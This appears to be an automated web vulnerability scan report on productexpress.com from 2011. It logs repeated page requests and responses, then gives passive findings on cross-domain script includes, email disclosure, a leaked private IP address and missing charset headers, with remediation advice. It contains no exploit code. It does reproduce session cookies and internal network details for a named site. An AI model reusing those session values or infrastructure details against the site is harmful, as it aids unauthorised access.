<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]... me="description" content="Buy pull up leather belts with a price guarantee and top rated customer service. You can compare multiple pull up leather belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /red-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:03 GMT Server: Apache Set-Cookie: JSESSIONID=457BA4111C198AD78A10690A02E43F48; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>R ...[SNIP]... <meta name="description" content="Buy red belts with a price guarantee and top rated customer service. You can compare multiple red belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /remo-tulliani-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:24 GMT Server: Apache Set-Cookie: JSESSIONID=BF9305013C7DA1D5532CA36B4A00A8FC; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>R ...[SNIP]... a name="description" content="Buy remo tulliani belts with a price guarantee and top rated customer service. You can compare multiple remo tulliani belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /remo-tulliani-teju/177961 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:25 GMT Server: Apache Set-Cookie: JSESSIONID=507F9DB07573722D8ADE5AD2B8F26AA4; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]... ion" content="Spiffy and fashionable Italian lizard print calfskin creates a cutting-edge design that compliments your style.Tapered four piece two tone Nickle and gold buckle set with a 30mm width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /remo-tulliani-teju/177961/401476 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:25 GMT Server: Apache Set-Cookie: JSESSIONID=81A89A4F76E13B918EF54D5D5C4397EF; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]... ion" content="Spiffy and fashionable Italian lizard print calfskin creates a cutting-edge design that compliments your style.Tapered four piece two tone Nickle and gold buckle set with a 30mm width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /remo-tulliani-teju/177961/401477 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:24 GMT Server: Apache Set-Cookie: JSESSIONID=67EC61833FB1087D7CE552CA640DAF9C; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]... ion" content="Spiffy and fashionable Italian lizard print calfskin creates a cutting-edge design that compliments your style.Tapered four piece two tone Nickle and gold buckle set with a 30mm width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /sale-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:02 GMT Server: Apache Set-Cookie: JSESSIONID=F0EC5ADA786BED85C655D17D0C59625E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]... <meta name="description" content="Buy sale shoes with a price guarantee and top rated customer service. You can compare multiple sale shoes styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /small-leather-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:20 GMT Server: Apache Set-Cookie: JSESSIONID=84BC6D5E1A203A247AC27E7D26B26AD3; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]... a name="description" content="Buy small leather belts with a price guarantee and top rated customer service. You can compare multiple small leather belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /tan-beige-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:38 GMT Server: Apache Set-Cookie: JSESSIONID=6A96D8A3BE984BC3E7629453906CACD0; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]... <meta name="description" content="Buy tan beige belts with a price guarantee and top rated customer service. You can compare multiple tan beige belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /tan-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:38 GMT Server: Apache Set-Cookie: JSESSIONID=69E3BE8949BF57B2F58548D27FB06DFF; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]... <meta name="description" content="Buy tan belts with a price guarantee and top rated customer service. You can compare multiple tan belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /under-$35-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:44 GMT Server: Apache Set-Cookie: JSESSIONID=813DFCC61270B7B182E7B5A758C2CF11; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>U ...[SNIP]... <meta name="description" content="Buy under $35 belts with a price guarantee and top rated customer service. You can compare multiple under $35 belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /usa-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:57 GMT Server: Apache Set-Cookie: JSESSIONID=C8F9F9856F8BD272341987572817A96D; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>U ...[SNIP]... <meta name="description" content="Buy usa belts with a price guarantee and top rated customer service. You can compare multiple usa belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /white-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:44 GMT Server: Apache Set-Cookie: JSESSIONID=88261D90A32BE87D470CEECCE2B32F31; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>W ...[SNIP]... <meta name="description" content="Buy white belts with a price guarantee and top rated customer service. You can compare multiple white belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following RFC 1918 IP address was disclosed in the response:
10.101.208.29
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
Request
GET / HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /cgi-bin/storeEmail.pl HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:21 GMT Server: Apache Edge-control: no-store, max-age=0, downstream-ttl=0 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML> <HEAD> <TITLE>Productexpress.com </TITLE> <link rel="stylesheet" type="text/css" href="/cs ...[SNIP]...